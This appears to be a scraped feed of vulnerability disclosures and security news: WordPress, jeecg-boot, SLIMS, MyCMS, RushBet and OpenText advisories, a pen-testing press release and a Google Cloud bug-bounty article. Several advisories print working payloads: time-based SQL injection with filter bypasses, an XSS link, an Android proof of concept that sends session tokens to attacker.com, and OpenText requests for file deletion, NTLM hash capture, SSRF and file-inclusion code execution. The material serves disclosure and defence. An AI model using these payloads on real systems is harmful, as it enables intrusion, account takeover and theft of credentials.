Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in 3com – Asesor de Cookies para normativa española plugin <= 3.4.3 versions.

**Solution**

No patched version is available. No reply from the vendor.

ptsfence discovered and reported this Cross Site Scripting (XSS) vulnerability in WordPress 3com – Asesor de Cookies para normativa española Plugin. This could allow a malicious actor to inject malicious scripts, such as redirects, advertisements, and other HTML payloads into your website which will be executed when guests visit your site. This vulnerability has not been known to be fixed yet.

**No other known vulnerabilities for this plugin**Report

**Report to Patchstack Alliance bounty platform and earn monthly cash prizes.**

Learn more

CVE-2022-40697: WordPress 3com – Asesor de Cookies plugin <= 3.4.3 - Auth. Stored Cross-Site Scripting (XSS) vulnerability - Patchstack

The report highlights concerning security stats following two years of extreme tech growth.

**OTTAWA,** **ON****,** **Jan.** **19,** **2023** **/PRNewswire/ -** The media industry is at higher risk of cyber attack. According to the newly released State of Penetration Testing as a Service report, an average of 3.75 critical vulnerabilities were found for every MediaTech application tested in 2022. During the same period, the data & analytics industry came second with an average of 1.5 critical vulnerabilities found per client application. Across all industries, 0.9 critical vulnerabilities were identified per client application.

Critical vulnerabilities are the most severe form of application security risk, and include categories of vulnerabilities such as SQL injection (SQLi), remote code execution (RCE), command injections, and unauthorized administrative host/application access. The "OWASP Top 10" also defines a list of the most common and severe vulnerabilities facing software applications today.

Companies facing critical vulnerabilities are at high risk as these issues are easily exploitable and will have significant damaging effects if exploited by a malicious hacker. Negative consequences include unauthorized release of confidential information, access to sensitive customer data, and access to control internal systems. As such, most companies are recommended to fix these within a maximum of 5 days after discovery.

Software Secured, an Ottawa\-based penetration testing firm, released the report based on insights from their client testing in 2021 and 2022. The goal of the report is to help leaders of security and compliance teams understand the most prominent risks facing their software within the next year. Included within the report are explanations on the identified threats and recommendations for companies to stay ahead of hackers. Some other insights gained from their reporting include:

*   Increase in critical-level SQL injection attacks by 250% compared to 2021
*   Increase in high-severity Denial of Service (DoS) attacks by 133% compared to 2021
*   Cross-site scripting (XSS) findings remain the most common critical vulnerability for two years in a row

Penetration testing as a service (PTaaS) is a comprehensive security assessment that is proven to help companies secure their applications, significantly decreasing the likelihood of cyber attacks

Download the full 2022 State of Penetration Testing as a Service report here.

For more information or questions, please visit us online at softwaresecured.com or contact us with the information below:

SOURCE Software Secured

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

The Media Industry Is the Most Vulnerable to Cyber Attacks, Report Shows

Six payouts issued for bugs uncovered in Theia, Vertex AI, Compute Engine, and Cloud Workstations

Six payouts issued for bugs uncovered in Theia, Vertex AI, Compute Engine, and Cloud Workstations

Vulnerabilities in four Google Cloud Platform (GCP) projects have earned a pair of security researchers more than $22,000 in bug bounties.

The most lucrative project for hacker duo Sreeram KL and Sivanesh Ashok was machine learning training and deployment platform Vertex AI, which netted them a pair of $5,000 payouts for a server-side request forgery (SSRF) bug and subsequent patch bypass.

Documented in a blog post by Sreeram, the flaw resided in Vertex AI’s workbench feature, which enables the creation of Jupyter notebook-based development environments on the cloud.

By abusing the SSRF vulnerability and duping victims into clicking a malicious URL, attackers could potentially seize control of an authorization token and thereafter all of the victim’s GCP projects, as demonstrated in the video below.

  
**SSRF bug**

When the researchers found a URL that seemed to offer scope for SSRF, “requesting the original URL resulted in a response that looked like the output of an authenticated request sent to compute.googleapis.com,” said Sreeram. “From previous experience, I know these endpoints use the authorization header for credentials.”

Fuzzing surfaced a URL – https://{INSTANCE-ID}-dot-us-central1.notebooks.googleusercontent.com/aipn/v2/proxy/{attacker.com}/compute.googleapis.com/ – that bypassed this check, said Sreeram. “Furthermore, the vulnerable endpoint was a request with no CSRF protection (pretty common),” said Sreeram.

YOU MIGHT ALSO LIKE US government announces third Hack The Pentagon challenge

As for finding attack targets, a victim’s subdomain is readily ascertained because subdomains are leaked to several third-party domains, such as github.com, “via referer in the general application flow”.

Google addressed the issue by adding cross-site request forgery (CSRF) protection to the endpoints and improving verification of the domain.

**Patch bypass**

After the fix was rolled out, however, Sreeram and Ashok noticed that changing compute.googleapis.com to something.google.com failed to trigger an error as it had previously.

Circumventing the fix therefore needed an open redirection in \*.google.com, they surmised.

With JavaScript-based redirections not an option – since the server didn’t parse the language – they turned to Google web feed management service FeedBurner. The researchers found that when the user deactivates the proxy, the service will redirect URLs to their domain rather than proxying their RSS feed.

The exploit concluded with a CSRF bypass that leveraged a technique developed in 2020 by ‘@s1r1us’ targeting Jupyter Lab.

The second fix involved ending support for \*.google.com as a proxy URL.

“While finding this issue, we gained insight into the workings of managed GCP products, which helped us find other bugs in GCP,” Sreeram told The Daily Swig.

  
**Theia, Compute Engine, Workstations bugs**

This included exploiting the workbench feature again in Theia, the integrated development environment (IDE) Google uses in Cloud Shell, as disclosed in a separate blog post published by Sreeram.

Because user-managed instances used the project’s default compute engine service account, the research duo were able to compromise the entire project by exploiting a known XSS vulnerability (CVE-2021-41038) to fetch the service account token from the metadata server. This earned the pair a further $3133.70 bounty.

Catch up with the latest bug bounty news

The first security flaw they found in GCP, as documented by Ashok, was an SSH key injection issue in Google Cloud’s Compute Engine.

Generating a $5,000 windfall with a $1,000 bounty bonus, the vulnerability resided in the SSH-in-browser function and could lead to remote code execution (RCE) in a victim’s Compute Engine instance (as demonstrated in the proof-of-concept video above).

The researchers also earned a further $3,133.70 for an authorization bypass in Cloud Workstations, which provides fully managed development environments for security-sensitive enterprises. Ashok outlined this find in a fourth blog post.

The pair earned a total of $22,267 from six separate bug bounty payouts.

The Daily Swig has invited Google to comment on these vulnerabilities but no response yet. We’ll update the article should that change.

DON’T FORGET TO READ Squaring the CircleCI: DevOps platform publishes post-mortem on recent breach

Google pays hacker duo $22k in bug bounties for flaws in multiple cloud projects

Jeecg-boot v3.4.4 was discovered to contain a SQL injection vulnerability via the component /sys/dict/queryTableData.

**版本号：3.4.4****前端版本：vue2版****问题描述：sql注入检测代码存在绕过.****截图&代码：**

SqlInjectionUtil类中sql的注释正则为

private final static Pattern SQL\_ANNOTATION = Pattern.compile("/\\\\\*.\*\\\\\*/");

.无法匹配到%0A, 导致可以利用/\*%0A\*/绕过  
关键字检测后存在空格,导致绕过

private final static String XSS\_STR = "and |extractvalue|updatexml|exec |insert |select |delete |update |drop |count |chr |mid |master |truncate |char |declare |;|or |+|user()";

AbstractQueryBlackListHandler类中的黑名单:

ruleMap.put("sys\_user", "password,salt");

在isPass函数中ruleMap.get(name)为null即可绕过, 可以采用sys_user, (sys\_user), sys\_user%20等绕过

存在多个注入点:

1.  /sys/duplicate/check接口:

dataId\=2000&fieldName\=(select(if(((select/\*%0A\*/password/\*%0A\*/from/\*%0A\*/sys\_user/\*%0A\*/where/\*%0A\*/username/\*%0A\*/\='jeecg')='eee378a1258530cb'),sleep(4),1)))&fieldVal\=1000&tableName\=sys\_log

2.  /sys/api/getDictItems  
    该接口没有进行签名校验:

?dictCode\=sys\_user%20,username,password

3.  sys/dict/queryTableData

?table\=%60sys\_user%60&pageSize\=22&pageNo\=1&text\=username&code\=password

**友情提示（为了提高issue处理效率）：**

*   未按格式要求发帖，会被直接删掉;
*   描述过于简单或模糊，导致无法处理的，会被直接删掉；
*   请自己初判问题描述是否清楚，是否方便我们调查处理；
*   针对问题请说明是Online在线功能(需说明用的主题模板)，还是生成的代码功能；

CVE-2022-47105: jeecg-boot3.4.4 存在sql注入漏洞 · Issue #4393 · jeecgboot/jeecg-boot

SLIMS version 9.5.2 suffers from a cross site scripting vulnerability.

    ## Title: SLIMS-9.5.2 - XSS Reflected - Account Exploit## Development: nu11secur1ty## Date: 01.19.2023## Vendor: https://slims.web.id/web/## Software: https://github.com/slims/slims9_bulian/releases/tag/v9.5.2## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.2## Description:The value of manual insertion `point 3` is copied into the HTMLdocument as plain text between tags.The payload udz21<script>alert(1)</script>rk346 was submitted inmanual insertion point 3.This input was echoed unmodified in the application's response.The attacker can trick the already logged-in user, to visit theexploit link that this attacker is created,and if this already logged-in user is not actually IT or admin, thiswill be the end of this system.## STATUS: HIGH Vulnerability[+] Exploit:```GET /slims9_bulian-9.5.2/admin/modules/reporting/customs/loan_by_class.php?reportView=true&year=2002&class=%27udz21%3Ca%20href=https://www.pornhub.com%3E%3Cimg%20src=https://i.postimg.cc/1tSM7Z7F/Hijacking-clipboard.gif%22%3E%50%6c%65%61%73%65%2c%20%76%69%73%69%74%20%6f%75%72%20%6d%61%69%6e%74%65%6e%61%6e%63%65%20%70%61%67%65%20%74%6f%20%63%68%65%63%6b%20%77%68%61%74%20%69%73%20%74%68%65%20%6c%61%74%65%73%74%20%6e%65%77%73%21%20%57%65%20%61%72%65%20%73%6f%72%72%79%20%66%6f%72%20%74%68%69%73%20%70%72%6f%62%6c%65%6d%21%20%54%68%69%73%20%77%69%6c%6c%20%62%65%20%66%69%78%65%64%20%73%6f%6f%6e&membershipType=a%27%27&collType=%27HTTP/1.1Host: pwnedhost1.comCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: SenayanAdmin=qavdssnj7kgu5g8a7d1pm0l3rr; admin_logged_in=1;SenayanMember=8f7c68j2b0pgbovehqcfuhcnl4Connection: close```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.5.2)## Proof and Exploit:[href](https://streamable.com/zd6e18)## Reference:[href](https://portswigger.net/web-security/cross-site-scripting)

SLIMS 9.5.2 Cross Site Scripting

A vulnerability was found in MyCMS. It has been classified as problematic. This affects the function build_view of the file lib/gener/view.php of the component Visitors Module. The manipulation of the argument original/converted leads to cross site scripting. It is possible to initiate the attack remotely. The name of the patch is d64fcba4882a50e21cdbec3eb4a080cb694d26ee. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218895.

CVE-2022-4892

RushBet version 2022.23.1-b490616d allows a remote attacker to steal customer accounts via use of a malicious application. This is possible because the application exposes an activity and does not properly validate the data it receives.

**Summary**

**Name**

RushBet 2022.23.1-b490616d - UXSS

**Code name**

Miller

**Product**

RushBet

**Affected versions**

Version 2022.23.1-b490616d

**State**

Public

**Release date**

2023-01-10

**Vulnerability**

**Kind**

Universal XSS

**Rule**

429\. Universal XSS (UXSS)

**Remote**

Yes

**CVSSv3 Vector**

CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:N

**CVSSv3 Base Score**

6.0

**Exploit available**

Yes

**CVE ID(s)**

CVE-2022-4235

**Description**

RushBet version 2022.23.1-b490616d allows a remote attacker to steal customer accounts via use of a malicious application. This is possible because the application exposes an activity and does not properly validate the data it receives.

**Vulnerability**

This vulnerability occurs because the application exposes an activity and does not properly validate the data it receives.

**Exploitation**

To exploit this vulnerability, the victim must have a malicious application installed with activity like the following:

**MainActivity.java**

    package com.example.badapp;
    
    import androidx.appcompat.app.AppCompatActivity;
    import android.content.Intent;
    import android.os.Handler;
    import android.os.Bundle;
    import android.net.Uri;
    
    public class MainActivity extends AppCompatActivity {
    
        @Override
        protected void onCreate(Bundle savedInstanceState) {
            super.onCreate(savedInstanceState);
    
            Intent intent = new Intent("android.intent.action.VIEW");
            intent.setClassName("com.rush.co.rb","com.sugarhouse.casino.MainActivity");
            intent.setData(Uri.parse("https://rushbet.co/"));
            startActivity(intent);
    
            new Handler().postDelayed(() -> {
                intent.setAction("Action.EvaluateScript");
                intent.putExtra("KeyScript","fetch('https://attacker.com/sessionID/'+JSON.parse(sessionStorage.getItem('session-COP')).value);");
                startActivity(intent);
            }, 30000);
        }
    }
    

Thus, when the victim opens the malicious app, the exploit will be executed, thus hacking his account.

**Evidence of exploitation**

POC-Account-Takeover-Rushbet

**Our security policy**

We have reserved the CVE-2022-4235 to refer to this issue from now on.

*   https://fluidattacks.com/advisories/policy/

**System Information**

*   Version: RushBet 2022.23.1-b490616d
    
*   Operating System: GNU/Linux
    

**Mitigation**

An updated version of RushBet is available at the vendor page.

**Credits**

The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.

**References**

**Vendor page** https://www.rushbet.co

**Timeline**

2022-11-29

Vulnerability discovered.

2022-11-30

Vendor contacted.

2022-12-03

Vendor replied acknowledging the report.

2022-12-03

Vendor Confirmed the vulnerability.

2022-12-14

Vulnerability patched.

2023-01-10

Public Disclosure.

CVE-2022-4235: RushBet 2022.23.1-b490616d - Universal XSS | Advisories | Fluid Attacks

An issue was discovered in OpenText Content Suite Platform 22.1 (16.2.19.1803). The request handler for ll.KeepAliveSession sets a valid AdminPwd cookie even when the Web Admin password was not entered. This allows access to endpoints, which require a valid AdminPwd cookie, without knowing the password.

**Vendor description**

_"OpenText™ Extended ECM is an enterprise CMS platform that securely governs the information lifecycle by integrating with leading enterprise applications, such as SAP®, Microsoft® 365, Salesforce and SAP SuccessFactors®. Bringing content and processes together, Extended ECM provides access to information when and where it’s needed, improves decision-making and drives operational effectiveness."_

Source: https://www.opentext.com/products/extended-ecm

**Business recommendation**

The vendor provides a patch which should be installed immediately.

**Vulnerability Overview/Description****1) Deletion of arbitrary files (CVE-2022-45924)**

The endpoint itemtemplate.createtemplate2 allows a low privilege user to delete arbitrary files on the server's local filesystem.

**2) Privilege escalation due to logic error in cookie creation  (CVE-2022-45922)**

The request handler for a user accessible function sets a valid AdminPwd cookie that allows access to unauthorized endpoints without knowing the password.

**3) xmlExport multiple vulnerabilities (CVE-2022-45925)****3.1) Information disclosure**

The action \`xmlexport\` accepts the parameter requestContext. If this parameter is present, the response does include most of the HTTP headers sent to the server and some of the CGI variables like remote_addr and server_name.

**3.2) Capture of NTLM hashes**

The action xmlexport accepts the parameter transform in combination with stylesheet. The stylesheet parameter can be a nodeID or a filepath. If a filepath is specified, the ContentServer tries to open the file. As absolute paths are allowed it is possible to provide a network share to force the ContentServer to open a connection to the network share. This allows an attacker to capture the NTLM Hash of the user running the ContentServer.

**4) Evaluate webreports via notify.localizeEmailTemplate (CVE-2022-45926)**

The endpoint notify.localizeEmailTemplate does allow a low privilege user to evaluate webreports. This can be used to perform a Server Side Request Forgery (SSRF) attack, with nearly full control of the actual request.

**5) Local File Inclusion allows Oscript execution (CVE-2022-45928)**

Multiple endpoints allow the user to pass the parameter htmlFile, which is included in the HTML output rendering pipeline of the request. As the Content Server evaluates and executes Oscript code in HTML files, it is possible for an attacker to execute Oscript code. The Oscript scripting language allows the attacker for example to manipulate files on the filesystem, create new network connections or execute OS system commands.  

**Proof of concept****1) Deletion of arbitrary files (CVE-2022-45924)**

As a first step the user has to create a new Customer View Template object via /cs.exe?func=ll&objAction=create&objtype=844&nextURL=foo to get a valid cacheID. With the acquired cacheID the following request can be used to delete a file. The parameter DefinitionFile controls which file should be deleted.

    http:// opentext-dev/OTCS/cs.exe?func=itemtemplate.createtemplate2&objType=844&parentId=2000&acheID=730440157&DefinitionFile=C:/temp/poc-del.txt

**2) Privilege escalation due to logic error in cookie creation (CVE-2022-45922)**

Sending the following request returns a new valid AdminPwd cookie.

    [ PoC removed, will be published at a later date ]

Response:

    HTTP/1.1 200 OK
    Cache-Control: no-cache
    Pragma: no-cache
    Content-Type: application/json; charset=UTF-8
    Server: Microsoft-IIS/10.0
    Set-Cookie: LLCookie=7X%2BfmttVXssmR2fGiuA4%2BeDFI4%2FotYL4o%2BkpxBTZUWrlHqwvH%2BIg3BCPhuBhD%2B567K288n7PJNeZQkk75EmxtndEpU3chq3cFppnAQ7OAYMX%2Bvl09QntFKi9E%2BWekSdNU866093uXCT4IqYR1ofVfkoLKFwTiUf%2BhgrVKaB8aoLOLlBU5RIrNA%3D%3D; path=/OTCS/; httponly
    Set-Cookie: AdminPwd=oq6SNA9Db6yUl0vP1ucJkLuRhIYbvO3YdIujUbLLdzGMsygouzJlyuhDLTriq4C1XrMHxWYWkCeuxoZevX0%2BYyFMEevzZVXI6Fe82YBI3HnKu2Stq50vZ8bhPPQeBbXiW%2FRwgp8RHukHgnEWUq3axpUP5OHWCJj9V3Pj5%2FNNqJKie0gUv055KavSIj80Id4dXDiHVu%2FI6IXMhEb1Tm4EVLE1rjxMnpmZILTKds%2FkabH%2FanPx5Jl3YL%2BBkX0PiPe54guaWQj2ReTr1SW7Beomoriq2FrW%2BWK91OtMy%2BbrVTfgEZSRdRNIkA%3D%3D; path=/OTCS/; httponly
    X-Powered-By: ASP.NET
    Date: Sat, 01 Oct 2022 17:57:54 GMT
    Connection: close
    Content-Length: 221
    
    {"errMsg":"","ok":true,"sessionInactivity":1620000,"sessionLogoutURL":"?func=ll.DoLogout&secureRequestToken=STWVlmadtchZfgpCevUaWz%2FG%2BaDWVMAmJIByhcw6J3FRBkfQdUEyakxuWBKKZIfkujPUOp2jURQ%3D","sessionReactionTime":180000}
    

**3) xmlExport multiple vulnerabilities (CVE-2022-45925)****3.1) Information disclosure**

Sending the following request reveals sensitive information about the request:

    GET /OTCS//cs.exe?func=ll&objAction=xmlexport&requestContext=T&objId=2004 HTTP/1.1
    Host: opentext-dev
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.8,de-DE;q=0.5,de;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: LLCookie=Ztn...
    Upgrade-Insecure-Requests: 1

Response:

    HTTP/1.1 200 OK
    Content-Type: application/xml
    Server: Microsoft-IIS/10.0
    X-Powered-By: ASP.NET
    Date: Sat, 01 Oct 2022 16:13:40 GMT
    Connection: close
    Content-Length: 12581
    
    <?xml version="1.0" encoding="UTF-8"?>
    <livelink Acls='false' appversion='16.2.0' AttributeInfo='false' CallbackHandlerName='{''}' ContentInline='false' DoingImport='false' ExtUserInfo='false' FollowAliases='false' ForImport='false' HandlerName='XmlExport' NodeInfo='false' Permissions='false' Schema='false' Scope='one' src='XmlExport'>
      <context>
        <user deleted='0' groupid='999' groupname='[Content Server Administration]' groupownerid='1000' grouptype='11' id='1000' name='Admin' ownerid='1000' spaceid='0' type='0' userprivileges='16777215'/>
        <cgi auth_type='' content_length='0' content_type='' path_info='' query_string='func=ll&objAction=xmlexport&requestContext=T&objId=2004' remote_addr='$IP' remote_host='$IP' remote_user='' request_method='GET' script_name='/OTCS/cs.exe' server_name='opentext-dev' server_port='80' server_protocol='HTTP/1.1'/>
        <http>
          <header name='HTTP_ACCEPT' value='text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8'/>
          <header name='HTTP_ACCEPT_ENCODING' value='gzip, deflate'/>
          <header name='HTTP_ACCEPT_LANGUAGE' value='en-US,en;q=0.8,de-DE;q=0.5,de;q=0.3'/>
          <header name='HTTP_CONNECTION' value='close'/>
          <header name='HTTP_HOST' value='opentext-dev'/>
          <header name='HTTP_UPGRADE_INSECURE_REQUESTS' value='1'/>
          <header name='HTTP_USER_AGENT' value='Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0'/>
        </http>
      </context>

**3.2) Capture of NTLM hashes**

Sending the following request with a remote path as value for the stylesheet parameter initiates a SMB connection to the attacker's machine:

GET /OTCS//cs.exe?func=ll&&objId=50469&objAction=xmlexport&transform=T&stylesheet=//$attackerIP/msg.txt
 

    $ sudo impacket-smbserver test /tmp -smb2support
    Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
    
    [*] Config file parsed
    [*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
    [*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
    [*] Config file parsed
    [*] Config file parsed
    [*] Config file parsed
    [*] Incoming connection ($opentextIP,59639)
    [*] AUTHENTICATE_MESSAGE (\,DESKTOP-XXX)
    [*] User DESKTOP-XXX\ authenticated successfully
    [*] :::00::aaaaaaaaaaaaaaaa

**Important side effect:**

Specifying an existing file for the stylesheet parameter , which is not a valid stylesheet, results in an error. As this error skips the cleanup code the temporary file $OTCS_HOME\temp\xml\XslOutput_[digit]_[digit] is not removed. The content of this file is partially controlled by the attacker, as it contains the filename of the exported object. This could be further exploited as documented in vulnerability 5).

<?xml version="1.0" encoding="UTF-8"?>
  
    
    \*\*OBJECT NAME\*\* 

**4) Evaluate webreports via notify.localizeEmailTemplate (CVE-2022-45926)**

Sending the following request with the webreport source in the msgBody parameter allows the user to evaluate a webreport.

    POST /OTCS/cs.exe HTTP/1.1
    Host: opentext-dev
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Connection: close
    Cookie: LLCookie=zBH4...
    Origin: http:// opentext-dev
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 134
    
    func=notify.localizeEmailTemplate&language=_en_US&arg=5&msgBody=<@urlencode>Username: [LL_REPTAG_USERNAME /]<@/urlencode>&fetch=foobar

Response:

    HTTP/1.1 200 OK
    Cache-Control: no-cache
    Pragma: no-cache
    Content-Type: text/plain ;charset=UTF-8
    Server: Microsoft-IIS/10.0
    X-Powered-By: ASP.NET
    Date: Sat, 01 Oct 2022 18:33:29 GMT
    Connection: close
    Content-Length: 19
    
    Username: Admin

The tag LL_WEBREPORT_RESTCLIENT can be used to perform a Server Side Request Forgery (SSRF) attack, with nearly full control of the actual request. 

    POST /OTCS/cs.exe HTTP/1.1
    Host: opentext-dev
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Connection: close
    Cookie: LLCookie=hRj
    Origin: http:// opentext-dev
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 347
    
    func=notify.localizeEmailTemplate&language=_en_US&arg=5&msgBody=<@urlencode>	
    [LL_WEBREPORT_RESTCLIENT @URI:"http:// $attackerIP/" @METHOD:GET @RESPONSE:resp @HOST:$attackerIP @PORT:80 /]
    <@/urlencode>&fetch=<@urlencode>LL_WEB [ /] [LL_REPTAG_EOL /] LL_WEB_END<@/urlencode>

    $ ncat -v -l 80
    Ncat: Version 7.92 ( https:// nmap.org/ncat )
    Ncat: Listening on :::80
    Ncat: Listening on 0.0.0.0:80
    Ncat: Connection from $IP.
    Ncat: Connection from $IP:59856.
    GET http:// $attackerIP/ HTTP/1.1
    Connection: Keep-Alive
    Host: $attackerIP
    User-Agent: Poco
    Accept: */*  

Other dangerous tags could be RUNSHELL, LL_FETCHURL and LL_WEBREPORT_CALL 

The tag LL_WEBREPORT_RESTCLIENT is disabled by default in version 22.1.

**5) Local File Inclusion allows Oscript execution (CVE-2022-45928)**

One way to create a file on the server's filesystem with the desired \`Oscript\` code, is to use the **vulnerability 3.2** and its side effect:

*   Create a file
*   Set the filename to the Oscript code, which should be executed (e.g.:   `fArgs content: `.fArgs` `)
*   Run the xmlExport action with an invalid stylesheet (should be done   multiple times to increase the hit change for the LFI)

The temporary file XslOutput_2_3 has the following content:

    <?xml version="1.0" encoding="UTF-8"?>
      
        
        fArgs content: `.fArgs`

To include the previously created file and execute its Oscript code, the following request can be used.

    GET /OTCS/cs.exe?func=commdirectory.LookFeel&objid=49259&menutype=375&htmlFile=temp/xml/XslOutput_2_3 HTTP/1.1
    Host: opentext-dev
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.8,de-DE;q=0.5,de;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: close
    Cookie: LLCookie=gYkU6%2BmrbXPaZ87US9mHOswpXTZTyMujb3DmwyB8QglNf9TnicUFBS2%2BW2xv2rufPoyGb82bn3VuyMwvDckJpuncAOHxuIeTbPce%2B6RSn035HjDkk5b2b0rZyM%2FzbtIquS3bYOetho6kt3RYhvkl2ahLkHvhGtO6KUp%2BMX%2Fe43yTpBcw5g1umg%3D%3D; LLTZCookie=0; BrowseSettings=rm%2BT2O%2F0LEfyVN4tBpAlz8iw6wjD9YgjYihWC2sGyHOayyH0F8hfiQ%3D%3D; AdminPwd=CV6waXr6yPLjlL2OlABJf4ka0kmITRSOHWyZSpzRdfy0SvueX0YM%2B6KFPopV5ebviGckgD6K24tGD7HXiJ18UhvZQBS%2BBYSlBI%2BzI0JCeGSH76MxvN%2BogDT59s6MIHVP4PAqqL1YzQ9cRN4L6eZbdE2hySDTwUQTQlOrSoxJNS28IQMclNUnsgct11cbQgApGWazgFlph4brLk65xEfi%2BN%2FGs9rSEKAehMwc94MvoFZ%2B5LLOurbgZYCLaA0YIWuHIUdppEsBVmQKjYGsjyS%2BNcEvcuuiCm8g6C%2FtRIUl85i%2BGyNeFi1rAA%3D%3D; TargetBrowseObjID=0; TargetBrowseObjType=150; tl=public_timeline; Accordion=
    Upgrade-Insecure-Requests: 1

Response:

    HTTP/1.1 200 OK
    Cache-Control: no-cache
    Content-Type: text/html;charset=UTF-8
    Server: Microsoft-IIS/10.0
    X-Frame-Options: SAMEORIGIN
    Content-Security-Policy: frame-ancestors 'self'
    X-UA-Compatible: IE=edge
    Set-Cookie: LLCookie=P7RTINkymKF2z1S8RQ6i0mjQKzaOb%2F2KNgFT5C2uBJZCgJ3sZ36Tll6LMvFDy3MC9DpjK00EXcIAROS7BHPtiMQTUqZ%2FVc6UtBXlW1%2FCljp1jDh1%2BUM05PJDhWzz1Xjzqnuw1iyIiCVDRBpgG9ztKGjSYngYLx6663COmbGleiMRgDlyufNcYw%3D%3D; path=/OTCS/; httponly
    X-Powered-By: ASP.NET
    Date: Sun, 02 Oct 2022 10:37:09 GMT
    Connection: close
    Content-Length: 5762
    
    <!DOCTYPE html>
    <HTML LANG="en-US">
    
    </HEAD>
    
    
    <?xml version="1.0" encoding="UTF-8"?>
    
    
    fArgs content: R<'_ExtendSessionTimeout'=true,'_REQUEST'='llweb','AUTH_TYPE'='','CONTENT_LENGTH'='0','CONTENT_TYPE'='','func'='commdirectory.LookFeel','GATEWAY_INTERFACE'='CGI/1.1','htmlFile'='temp/xml/XslOutput_2_3','HTTP_ACCEPT'='text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8','HTTP_ACCEPT_ENCODING'='gzip, deflate','HTTP_ACCEPT_LANGUAGE'='en-US,en;q=0.8,de-DE;q=0.5,de;q=0.3','HTTP_CONNECTION'='close','HTTP_COOKIE'='LLTZCookie=0; BrowseSettings=uUS1%2FZ5g1c0XS4%2FNRpsSf2m14UItUrVHPWaVbvGjfcio6cpCyC5KPA%3D%3D; AdminPwd=6GxYwSEETjgXlHwOyzNue7sSkSKHieE2XNh7qe6h1MxuNNd3GlbD7NqlcaouTXLJvE84KXliXoS3rv0OEAoPMjLs%2B5navCaRtW32FuEYDhEtcTAetQzTUyEMJk8gtywZrslSilkjG%2FZjMh0S5nNi2MmkzquGi2BsKuKaN3dMGjscqQErAY9aIxAx1r%2FE7Gdsx1Vdo5SdILV2VdgVtjuMP3ul7RBYvHL1OsV4MtPjhB7s%2Flv6TXzrTUMzv3J%2BiVRxmXhxb%2BzFIAu7zE4DckTnGYE3tTP%2Fg1qL0GKrxVuBJbQIaZPyotwqSA%3D%3D; TargetBrowseObjID=0; TargetBrowseObjType=150; LLCookie=gYjACLksaCQXFyPM6bXgZFWxLST0MIVxqrqP9KwByUPbF8bVCKwyShPhoC0iRNqSytsqY1YfoW6i7DE39j7RpfjB4XnTw36lAps80xrs9nDkSqy1rDYqUsdbsHHJFSWCV5IzVVrS%2FuvrWBvv4e0HcYVpbbeXAI4%2BTWhmSWqDIvD68rCVqrrvRQ%3D%3D; tl=public_timeline; Accordion=','HTTP_HOST'='opentext-dev','HTTP_UPGRADE_INSECURE_REQUESTS'='1','HTTP_USER_AGENT'='Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0','HTTPS'='off','HTTPS_KEYSIZE'='','HTTPS_SECRETKEYSIZE'='','HTTPS_SERVER_ISSUER'='','HTTPS_SERVER_SUBJECT'='','LLENVIRON_ASSOC'=A<1,?,'AUTH_TYPE'='','CONTENT_LENGTH'='0','CONTENT_TYPE'='','GATEWAY_INTERFACE'='CGI/1.1','HTTP_ACCEPT'='text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8','HTTP_ACCEPT_ENCODING'='gzip, deflate','HTTP_ACCEPT_LANGUAGE'='en-US,en;q=0.8,de-DE;q=0.5,de;q=0.3','HTTP_CONNECTION'='close','HTTP_COOKIE'='LLTZCookie=0; BrowseSettings=uUS1%2FZ5g1c0XS4%2FNRpsSf2m14UItUrVHPWaVbvGjfcio6cpCyC5KPA%3D%3D; 